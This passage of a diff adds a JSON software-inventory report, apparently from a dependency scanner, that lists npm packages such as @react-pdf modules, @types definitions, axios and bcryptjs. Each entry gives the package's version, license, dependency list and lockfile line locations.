], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/layout@3.13.0", + "Name": "@react-pdf/layout", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/layout@3.13.0", + "UID": "501872a8793ee920" + }, + "Version": "3.13.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@react-pdf/fns@2.2.1", + "@react-pdf/image@2.3.6", + "@react-pdf/pdfkit@3.2.0", + "@react-pdf/primitives@3.1.1", + "@react-pdf/stylesheet@4.3.0", + "@react-pdf/textkit@4.4.1", + "@react-pdf/types@2.11.1", + "cross-fetch@3.2.0", + "emoji-regex@10.6.0", + "queue@6.0.2", + "yoga-layout@2.0.1" + ], + "Locations": [ + { + "StartLine": 2075, + "EndLine": 2094 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/pdfkit@3.2.0", + "Name": "@react-pdf/pdfkit", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/pdfkit@3.2.0", + "UID": "452f732c452f9297" + }, + "Version": "3.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@react-pdf/png-js@2.3.1", + "browserify-zlib@0.2.0", + "crypto-js@4.2.0", + "fontkit@2.0.4", + "jay-peg@1.1.1", + "vite-compatible-readable-stream@3.6.1" + ], + "Locations": [ + { + "StartLine": 2095, + "EndLine": 2109 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/pdfkit@5.1.1", + "Name": "@react-pdf/pdfkit", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/pdfkit@5.1.1", + "UID": "b6af1eae66473d4a" + }, + "Version": "5.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@noble/ciphers@1.3.0", + "@noble/hashes@1.8.0", + "browserify-zlib@0.2.0", + "fontkit@2.0.4", + "jay-peg@1.1.1", + "js-md5@0.8.3", + "linebreak@1.1.0", + "png-js@2.0.0", + "vite-compatible-readable-stream@3.6.1" + ], + "Locations": [ + { + "StartLine": 2223, + "EndLine": 2240 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/png-js@2.3.1", + "Name": "@react-pdf/png-js", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/png-js@2.3.1", + "UID": "9be4c6b4b0c6f0d6" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "browserify-zlib@0.2.0" + ], + "Locations": [ + { + "StartLine": 2110, + "EndLine": 2118 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/primitives@3.1.1", + "Name": "@react-pdf/primitives", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/primitives@3.1.1", + "UID": "aa34a561d882ad4c" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2119, + "EndLine": 2124 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/primitives@4.3.0", + "Name": "@react-pdf/primitives", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/primitives@4.3.0", + "UID": "bd2306e2fdc6cc5a" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2241, + "EndLine": 2246 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/render@3.5.0", + "Name": "@react-pdf/render", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/render@3.5.0", + "UID": "ee9d487433844bfd" + }, + "Version": "3.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@react-pdf/fns@2.2.1", + "@react-pdf/primitives@3.1.1", + "@react-pdf/textkit@4.4.1", + "@react-pdf/types@2.11.1", + "abs-svg-path@0.1.1", + "color-string@1.9.1", + "normalize-svg-path@1.1.0", + "parse-svg-path@0.1.2", + "svg-arc-to-cubic-bezier@3.2.0" + ], + "Locations": [ + { + "StartLine": 2125, + "EndLine": 2142 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/renderer@3.4.5", + "Name": "@react-pdf/renderer", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/renderer@3.4.5", + "UID": "30f7b15569b18830" + }, + "Version": "3.4.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@react-pdf/font@2.5.2", + "@react-pdf/layout@3.13.0", + "@react-pdf/pdfkit@3.2.0", + "@react-pdf/primitives@3.1.1", + "@react-pdf/render@3.5.0", + "@react-pdf/types@2.11.1", + "events@3.3.0", + "object-assign@4.1.1", + "prop-types@15.8.1", + "queue@6.0.2", + "react@18.3.1", + "scheduler@0.17.0" + ], + "Locations": [ + { + "StartLine": 2143, + "EndLine": 2165 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/stylesheet@4.3.0", + "Name": "@react-pdf/stylesheet", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/stylesheet@4.3.0", + "UID": "f6d4ed23b7d74197" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@react-pdf/fns@2.2.1", + "@react-pdf/types@2.11.1", + "color-string@1.9.1", + "hsl-to-hex@1.0.0", + "media-engine@1.0.3", + "postcss-value-parser@4.2.0" + ], + "Locations": [ + { + "StartLine": 2166, + "EndLine": 2180 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/stylesheet@6.2.1", + "Name": "@react-pdf/stylesheet", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/stylesheet@6.2.1", + "UID": "3047a0fd189f064f" + }, + "Version": "6.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-pdf/fns@3.1.3", + "@react-pdf/types@2.11.1", + "color-string@2.1.4", + "hsl-to-hex@1.0.0", + "media-engine@1.0.3", + "postcss-value-parser@4.2.0" + ], + "Locations": [ + { + "StartLine": 2247, + "EndLine": 2260 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/textkit@4.4.1", + "Name": "@react-pdf/textkit", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/textkit@4.4.1", + "UID": "21c4ad2126360102" + }, + "Version": "4.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@react-pdf/fns@2.2.1", + "bidi-js@1.0.3", + "hyphen@1.14.1", + "unicode-properties@1.4.1" + ], + "Locations": [ + { + "StartLine": 2181, + "EndLine": 2193 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/types@2.11.1", + "Name": "@react-pdf/types", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/types@2.11.1", + "UID": "35a04dce747be15f" + }, + "Version": "2.11.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-pdf/font@4.0.8", + "@react-pdf/primitives@4.3.0", + "@react-pdf/stylesheet@6.2.1" + ], + "Locations": [ + { + "StartLine": 2194, + "EndLine": 2204 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@selderee/plugin-htmlparser2@0.11.0", + "Name": "@selderee/plugin-htmlparser2", + "Identifier": { + "PURL": "pkg:npm/%40selderee/plugin-htmlparser2@0.11.0", + "UID": "ac11306a3ee51a3" + }, + "Version": "0.11.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "domhandler@5.0.3", + "selderee@0.11.0" + ], + "Locations": [ + { + "StartLine": 2695, + "EndLine": 2707 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@socket.io/component-emitter@3.1.2", + "Name": "@socket.io/component-emitter", + "Identifier": { + "PURL": "pkg:npm/%40socket.io/component-emitter@3.1.2", + "UID": "97cdac300a40f2a7" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2715, + "EndLine": 2720 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@swc/counter@0.1.3", + "Name": "@swc/counter", + "Identifier": { + "PURL": "pkg:npm/%40swc/counter@0.1.3", + "UID": "f52c1ef5929e45d8" + }, + "Version": "0.1.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2721, + "EndLine": 2726 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@swc/helpers@0.5.21", + "Name": "@swc/helpers", + "Identifier": { + "PURL": "pkg:npm/%40swc/helpers@0.5.21", + "UID": "5d92846d54fa2a4f" + }, + "Version": "0.5.21", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 2727, + "EndLine": 2735 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@swc/helpers@0.5.5", + "Name": "@swc/helpers", + "Identifier": { + "PURL": "pkg:npm/%40swc/helpers@0.5.5", + "UID": "6ca366c10305d371" + }, + "Version": "0.5.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@swc/counter@0.1.3", + "tslib@2.4.1" + ], + "Locations": [ + { + "StartLine": 7281, + "EndLine": 7290 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@tootallnate/once@2.0.0", + "Name": "@tootallnate/once", + "Identifier": { + "PURL": "pkg:npm/%40tootallnate/once@2.0.0", + "UID": "22f57853d23edc3a" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2742, + "EndLine": 2751 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/caseless@0.12.5", + "Name": "@types/caseless", + "Identifier": { + "PURL": "pkg:npm/%40types/caseless@0.12.5", + "UID": "3dd9740db251615" + }, + "Version": "0.12.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2798, + "EndLine": 2804 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/cors@2.8.19", + "Name": "@types/cors", + "Identifier": { + "PURL": "pkg:npm/%40types/cors@2.8.19", + "UID": "2312b62bda407388" + }, + "Version": "2.8.19", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@20.19.39" + ], + "Locations": [ + { + "StartLine": 2822, + "EndLine": 2830 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-array@3.2.2", + "Name": "@types/d3-array", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-array@3.2.2", + "UID": "7958f5ac026eed8c" + }, + "Version": "3.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2831, + "EndLine": 2836 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-color@3.1.3", + "Name": "@types/d3-color", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-color@3.1.3", + "UID": "375186a8ff5dcb93" + }, + "Version": "3.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2837, + "EndLine": 2842 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-ease@3.0.2", + "Name": "@types/d3-ease", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-ease@3.0.2", + "UID": "67ff7b5bd571efaf" + }, + "Version": "3.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2843, + "EndLine": 2848 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-interpolate@3.0.4", + "Name": "@types/d3-interpolate", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-interpolate@3.0.4", + "UID": "3f910c0dfbc823e" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/d3-color@3.1.3" + ], + "Locations": [ + { + "StartLine": 2849, + "EndLine": 2857 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-path@3.1.1", + "Name": "@types/d3-path", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-path@3.1.1", + "UID": "a9a7a5ff5243c1a3" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2858, + "EndLine": 2863 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-scale@4.0.9", + "Name": "@types/d3-scale", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-scale@4.0.9", + "UID": "cb3f78a66dabd70c" + }, + "Version": "4.0.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/d3-time@3.0.4" + ], + "Locations": [ + { + "StartLine": 2864, + "EndLine": 2872 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-shape@3.1.8", + "Name": "@types/d3-shape", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-shape@3.1.8", + "UID": "270d1653f06304b8" + }, + "Version": "3.1.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/d3-path@3.1.1" + ], + "Locations": [ + { + "StartLine": 2873, + "EndLine": 2881 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-time@3.0.4", + "Name": "@types/d3-time", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-time@3.0.4", + "UID": "be66b4addfe55e7a" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2882, + "EndLine": 2887 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/d3-timer@3.0.2", + "Name": "@types/d3-timer", + "Identifier": { + "PURL": "pkg:npm/%40types/d3-timer@3.0.2", + "UID": "95b7d7a07d2fd10f" + }, + "Version": "3.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2888, + "EndLine": 2893 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/jsonwebtoken@9.0.10", + "Name": "@types/jsonwebtoken", + "Identifier": { + "PURL": "pkg:npm/%40types/jsonwebtoken@9.0.10", + "UID": "c65e23d8d5cbeb08" + }, + "Version": "9.0.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/ms@2.1.0", + "@types/node@20.19.39" + ], + "Locations": [ + { + "StartLine": 2934, + "EndLine": 2943 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/long@4.0.2", + "Name": "@types/long", + "Identifier": { + "PURL": "pkg:npm/%40types/long@4.0.2", + "UID": "4858c741b877e4e0" + }, + "Version": "4.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2944, + "EndLine": 2950 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/ms@2.1.0", + "Name": "@types/ms", + "Identifier": { + "PURL": "pkg:npm/%40types/ms@2.1.0", + "UID": "d48e775b550c5b8f" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2975, + "EndLine": 2980 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/node@22.19.17", + "Name": "@types/node", + "Identifier": { + "PURL": "pkg:npm/%40types/node@22.19.17", + "UID": "480c2123c29a3c3b" + }, + "Version": "22.19.17", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "undici-types@6.21.0" + ], + "Locations": [ + { + "StartLine": 5533, + "EndLine": 5541 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/request@2.48.13", + "Name": "@types/request", + "Identifier": { + "PURL": "pkg:npm/%40types/request@2.48.13", + "UID": "869d1017c8001095" + }, + "Version": "2.48.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/caseless@0.12.5", + "@types/node@20.19.39", + "@types/tough-cookie@4.0.5", + "form-data@2.5.5" + ], + "Locations": [ + { + "StartLine": 3069, + "EndLine": 3081 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/tough-cookie@4.0.5", + "Name": "@types/tough-cookie", + "Identifier": { + "PURL": "pkg:npm/%40types/tough-cookie@4.0.5", + "UID": "fde0cd6bdbfced1a" + }, + "Version": "4.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3170, + "EndLine": 3176 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/ws@8.18.1", + "Name": "@types/ws", + "Identifier": { + "PURL": "pkg:npm/%40types/ws@8.18.1", + "UID": "8fd24df18e05eaa2" + }, + "Version": "8.18.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@20.19.39" + ], + "Locations": [ + { + "StartLine": 3177, + "EndLine": 3185 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "abbrev@2.0.0", + "Name": "abbrev", + "Identifier": { + "PURL": "pkg:npm/abbrev@2.0.0", + "UID": "7ebfb48a1322c943" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3296, + "EndLine": 3304 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "abort-controller@3.0.0", + "Name": "abort-controller", + "Identifier": { + "PURL": "pkg:npm/abort-controller@3.0.0", + "UID": "32181bbecaca3ec8" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "event-target-shim@5.0.1" + ], + "Locations": [ + { + "StartLine": 3305, + "EndLine": 3317 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "abs-svg-path@0.1.1", + "Name": "abs-svg-path", + "Identifier": { + "PURL": "pkg:npm/abs-svg-path@0.1.1", + "UID": "f56d8be7fa7b59f4" + }, + "Version": "0.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3318, + "EndLine": 3323 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "accepts@1.3.8", + "Name": "accepts", + "Identifier": { + "PURL": "pkg:npm/accepts@1.3.8", + "UID": "a9c129faacd93d3c" + }, + "Version": "1.3.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mime-types@2.1.35", + "negotiator@0.6.3" + ], + "Locations": [ + { + "StartLine": 3324, + "EndLine": 3336 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "agent-base@6.0.2", + "Name": "agent-base", + "Identifier": { + "PURL": "pkg:npm/agent-base@6.0.2", + "UID": "40442c8a9581d36c" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 6159, + "EndLine": 6171 + }, + { + "StartLine": 9552, + "EndLine": 9564 + }, + { + "StartLine": 10019, + "EndLine": 10030 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "agent-base@7.1.4", + "Name": "agent-base", + "Identifier": { + "PURL": "pkg:npm/agent-base@7.1.4", + "UID": "5e9fb0d51d16556" + }, + "Version": "7.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3373, + "EndLine": 3382 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-regex@5.0.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@5.0.1", + "UID": "5cb6bac70ccd264c" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3400, + "EndLine": 3408 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-regex@6.2.2", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@6.2.2", + "UID": "7026bcee75094924" + }, + "Version": "6.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1435, + "EndLine": 1446 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-styles@4.3.0", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@4.3.0", + "UID": "d06cd1d057ea687c" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@2.0.1" + ], + "Locations": [ + { + "StartLine": 3409, + "EndLine": 3423 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-styles@6.2.3", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@6.2.3", + "UID": "fc622566e58e587a" + }, + "Version": "6.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1447, + "EndLine": 1458 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "any-promise@1.3.0", + "Name": "any-promise", + "Identifier": { + "PURL": "pkg:npm/any-promise@1.3.0", + "UID": "2adbd9d40d27dc0b" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3424, + "EndLine": 3429 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "anymatch@3.1.3", + "Name": "anymatch", + "Identifier": { + "PURL": "pkg:npm/anymatch@3.1.3", + "UID": "f0dd5cd624ce9f8" + }, + "Version": "3.1.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "normalize-path@3.0.0", + "picomatch@2.3.2" + ], + "Locations": [ + { + "StartLine": 3430, + "EndLine": 3442 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "append-field@1.0.0", + "Name": "append-field", + "Identifier": { + "PURL": "pkg:npm/append-field@1.0.0", + "UID": "5321e9d0a7c0e6ea" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3443, + "EndLine": 3448 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "arg@5.0.2", + "Name": "arg", + "Identifier": { + "PURL": "pkg:npm/arg@5.0.2", + "UID": "92e2335c9d9b548" + }, + "Version": "5.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3449, + "EndLine": 3454 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "array-flatten@1.1.1", + "Name": "array-flatten", + "Identifier": { + "PURL": "pkg:npm/array-flatten@1.1.1", + "UID": "1fd703b79f7101a1" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3462, + "EndLine": 3467 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "arrify@2.0.1", + "Name": "arrify", + "Identifier": { + "PURL": "pkg:npm/arrify@2.0.1", + "UID": "d91a256606e8f2be" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3468, + "EndLine": 3477 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "async-retry@1.3.3", + "Name": "async-retry", + "Identifier": { + "PURL": "pkg:npm/async-retry@1.3.3", + "UID": "9ad114c0bfe66f34" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "retry@0.13.1" + ], + "Locations": [ + { + "StartLine": 3495, + "EndLine": 3504 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "asynckit@0.4.0", + "Name": "asynckit", + "Identifier": { + "PURL": "pkg:npm/asynckit@0.4.0", + "UID": "cd3f0709d26de45f" + }, + "Version": "0.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3505, + "EndLine": 3510 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "autoprefixer@10.5.0", + "Name": "autoprefixer", + "Identifier": { + "PURL": "pkg:npm/autoprefixer@10.5.0", + "UID": "7718563aaaf938af" + }, + "Version": "10.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "browserslist@4.28.2", + "caniuse-lite@1.0.30001791", + "fraction.js@5.3.4", + "picocolors@1.1.1", + "postcss-value-parser@4.2.0", + "postcss@8.5.12" + ], + "Locations": [ + { + "StartLine": 3511, + "EndLine": 3546 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "axios@1.15.2", + "Name": "axios", + "Identifier": { + "PURL": "pkg:npm/axios@1.15.2", + "UID": "56d057767da7b39e" + }, + "Version": "1.15.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "follow-redirects@1.16.0", + "form-data@4.0.5", + "proxy-from-env@2.1.0" + ], + "Locations": [ + { + "StartLine": 3547, + "EndLine": 3557 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "balanced-match@1.0.2", + "Name": "balanced-match", + "Identifier": { + "PURL": "pkg:npm/balanced-match@1.0.2", + "UID": "a056fa1636630264" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3574, + "EndLine": 3579 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "base64-js@0.0.8", + "Name": "base64-js", + "Identifier": { + "PURL": "pkg:npm/base64-js@0.0.8", + "UID": "4b43187f18480ade" + }, + "Version": "0.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6731, + "EndLine": 6739 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "base64-js@1.5.1", + "Name": "base64-js", + "Identifier": { + "PURL": "pkg:npm/base64-js@1.5.1", + "UID": "3c71b4deb6da91b8" + }, + "Version": "1.5.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3580, + "EndLine": 3599 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "base64id@2.0.0", + "Name": "base64id", + "Identifier": { + "PURL": "pkg:npm/base64id@2.0.0", + "UID": "89c8160020d6d675" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3600, + "EndLine": 3608 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "baseline-browser-mapping@2.10.24", + "Name": "baseline-browser-mapping", + "Identifier": { + "PURL": "pkg:npm/baseline-browser-mapping@2.10.24", + "UID": "993b3b6c60f1f70c" + }, + "Version": "2.10.24", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3609, + "EndLine": 3620 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "basic-auth@2.0.1", + "Name": "basic-auth", + "Identifier": { + "PURL": "pkg:npm/basic-auth@2.0.1", + "UID": "38d110a9d6e306e9" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.1.2" + ], + "Locations": [ + { + "StartLine": 3621, + "EndLine": 3632 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bcryptjs@2.4.3", + "Name": "bcryptjs", + "Identifier": { + "PURL": "pkg:npm/bcryptjs@2.4.3", + "UID": "8e36e4990487cb5e" + }, + "Version": "2.4.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3639, + "EndLine": 3644 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bidi-js@1.0.3", + "Name": "bidi-js", + "Identifier": { + "PURL": "pkg:npm/bidi-js@1.0.3", + "UID": "35a87ab9ba9b22b1" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "require-from-string@2.0.2" + ], + "Locations": [ + { + "StartLine": 3645, + "EndLine": 3653 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bignumber.js@9.3.1", + "Name": "bignumber.js", + "Identifier": { + "PURL": "pkg:npm/bignumber.js@9.3.1", + "UID": "76ae339798c843ca" + }, + "Version": "9.3.1", + "Licenses": [ + 